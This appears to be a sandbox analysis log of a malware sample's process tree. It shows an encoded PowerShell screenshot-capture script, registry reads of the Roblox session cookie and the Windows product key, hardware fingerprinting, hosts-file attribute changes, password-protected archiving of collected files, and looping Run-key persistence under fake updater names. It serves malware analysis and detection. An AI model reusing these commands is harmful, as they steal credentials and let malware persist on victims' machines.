C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=63⤵
- Suspicious behavior: EnumeratesProcesses
PID:1276 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2550zkfx\2550zkfx.cmdline"64⤵PID:3244
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBC85.tmp" "c:\Users\Admin\AppData\Local\Temp\2550zkfx\CSCEDC1BD54A26B460EB6EB3D577667581.TMP"65⤵PID:3984
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"62⤵PID:4876
-
C:\Windows\system32\tree.comtree /A /F63⤵PID:2360
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"62⤵PID:3404
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts63⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:4708
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"62⤵PID:3080
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts63⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:5480
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"62⤵PID:5332
-
C:\Windows\system32\tree.comtree /A /F63⤵PID:2480
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"62⤵PID:5588
-
C:\Windows\system32\tasklist.exetasklist /FO LIST63⤵
- Enumerates processes with tasklist
PID:2640
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"62⤵PID:5192
-
C:\Windows\system32\tree.comtree /A /F63⤵PID:6044
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"62⤵PID:5240
-
C:\Windows\system32\tree.comtree /A /F63⤵PID:5556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"62⤵PID:1644
-
C:\Windows\system32\tree.comtree /A /F63⤵PID:5568
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"62⤵PID:2856
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY63⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:6052
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"62⤵PID:2968
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY63⤵
- Suspicious behavior: EnumeratesProcesses
PID:5340
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"62⤵PID:4896
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV163⤵PID:5968
-
-
C:\Windows\system32\getmac.exegetmac63⤵PID:3396
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI4562\rar.exe a -r -hp"Aquarius" "C:\Users\Admin\AppData\Local\Temp\7q0md.zip" *"62⤵PID:2252
-
C:\Users\Admin\AppData\Local\Temp\_MEI4562\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI4562\rar.exe a -r -hp"Aquarius" "C:\Users\Admin\AppData\Local\Temp\7q0md.zip" *63⤵PID:5576
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"62⤵PID:5644
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption63⤵PID:5404
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"62⤵PID:4780
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory63⤵PID:4088
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"62⤵PID:1016
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid63⤵PID:2764
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"62⤵PID:5536
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER63⤵
- Command and Scripting Interpreter: PowerShell
PID:4872
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"62⤵PID:5692
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name63⤵
- Detects videocard installed
PID:5840
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"62⤵PID:3220
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault63⤵PID:3924
-
-
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"60⤵PID:5704
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"60⤵
- Checks computer location settings
PID:516 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AB7D.tmp\AB7E.tmp\AB7F.bat C:\Windows\system32\java.exe"61⤵PID:2272
-
C:\Windows\system32\timeout.exetimeout 162⤵PID:100
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f62⤵PID:2216
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f62⤵PID:1836
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f62⤵PID:416
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f62⤵PID:5716
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"62⤵PID:3492
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"63⤵PID:5972
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"62⤵PID:5848
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"62⤵
- Checks computer location settings
PID:3260 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B2E0.tmp\B2E1.tmp\B2E2.bat C:\Windows\system32\java.exe"63⤵
- Drops file in System32 directory
PID:5428 -
C:\Windows\system32\timeout.exetimeout 164⤵PID:3804
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f64⤵PID:4952
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f64⤵PID:5348
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f64⤵PID:5236
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f64⤵
- Adds Run key to start application
PID:5492
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"64⤵PID:4288
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"65⤵PID:3696
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"64⤵PID:6112
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"64⤵
- Checks computer location settings
PID:1092 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BDAE.tmp\BDAF.tmp\BDB0.bat C:\Windows\system32\java.exe"65⤵PID:1448
-
C:\Windows\system32\timeout.exetimeout 166⤵
- Delays execution with timeout.exe
PID:5708
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f66⤵PID:5636
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f66⤵PID:5332
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f66⤵PID:5808
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f66⤵PID:852
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"66⤵PID:5784
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"67⤵PID:5240
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"66⤵PID:4988
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"66⤵
- Checks computer location settings
PID:5524 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C3D8.tmp\C3D9.tmp\C3DA.bat C:\Windows\system32\java.exe"67⤵PID:1136
-
C:\Windows\system32\timeout.exetimeout 168⤵PID:1732
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f68⤵PID:4088
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f68⤵PID:5176
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f68⤵
- Adds Run key to start application
PID:4724
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f68⤵PID:5872
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"68⤵PID:5616
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"69⤵PID:4068
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"68⤵PID:5420
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"68⤵
- Checks computer location settings
PID:684 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CAEC.tmp\CAED.tmp\CAEE.bat C:\Windows\system32\java.exe"69⤵PID:1980
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV170⤵PID:5480
-
-
C:\Windows\system32\timeout.exetimeout 170⤵
- Delays execution with timeout.exe
PID:5272
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f70⤵PID:4964
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f70⤵PID:5380
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f70⤵PID:3416
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f70⤵
- Adds Run key to start application
PID:3248
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"70⤵PID:2492
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"71⤵PID:5716
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"70⤵PID:5860
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"70⤵
- Checks computer location settings
PID:2736 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D25E.tmp\D25F.tmp\D260.bat C:\Windows\system32\java.exe"71⤵
- Drops file in System32 directory
PID:1536 -
C:\Windows\system32\timeout.exetimeout 172⤵PID:2968
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f72⤵PID:5884
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f72⤵PID:2256
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f72⤵
- Adds Run key to start application
PID:5768
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f72⤵PID:4484
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"72⤵PID:5540
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"73⤵PID:840
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"72⤵PID:6096
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"72⤵
- Checks computer location settings
PID:5516 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DA6D.tmp\DA6E.tmp\DA6F.bat C:\Windows\system32\java.exe"73⤵PID:3248
-
C:\Windows\system32\timeout.exetimeout 174⤵PID:3124
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f74⤵
- Adds Run key to start application
PID:4860
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f74⤵
- Adds Run key to start application
PID:3116
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f74⤵PID:1680
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f74⤵PID:1744
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"74⤵PID:5748
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"75⤵PID:5152
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"74⤵PID:3860
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"74⤵
- Checks computer location settings
PID:516 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E25C.tmp\E25D.tmp\E25E.bat C:\Windows\system32\java.exe"75⤵
- Drops file in System32 directory
PID:64 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV176⤵PID:2492
-
-
C:\Windows\system32\timeout.exetimeout 176⤵
- Delays execution with timeout.exe
PID:5724
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f76⤵PID:4796
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f76⤵PID:5324
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f76⤵
- Adds Run key to start application
PID:3508
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f76⤵PID:2684
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"76⤵PID:2968
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"77⤵PID:5424
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"76⤵PID:4556
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"76⤵
- Checks computer location settings
PID:3204 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E9FD.tmp\E9FE.tmp\E9FF.bat C:\Windows\system32\java.exe"77⤵
- Drops file in System32 directory
PID:3396 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV178⤵PID:4896
-
-
C:\Windows\system32\timeout.exetimeout 178⤵PID:5944
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f78⤵PID:5868
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f78⤵PID:5640
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f78⤵
- Adds Run key to start application
PID:6044
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f78⤵PID:5840
-
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"78⤵PID:6032
-
C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"79⤵PID:5740
-
-
-
C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"78⤵PID:5064
-
-
C:\Windows\system32\java.exe"C:\Windows\system32\java.exe"78⤵
- Checks computer location settings
PID:3664 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F20C.tmp\F20D.tmp\F20E.bat C:\Windows\system32\java.exe"79⤵PID:3544
-
C:\Windows\system32\timeout.exetimeout 180⤵
- Delays execution with timeout.exe
PID:3852
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f80⤵
- Adds Run key to start application
PID:5568
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f80⤵PID:6060
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f80⤵PID:1276
-
-
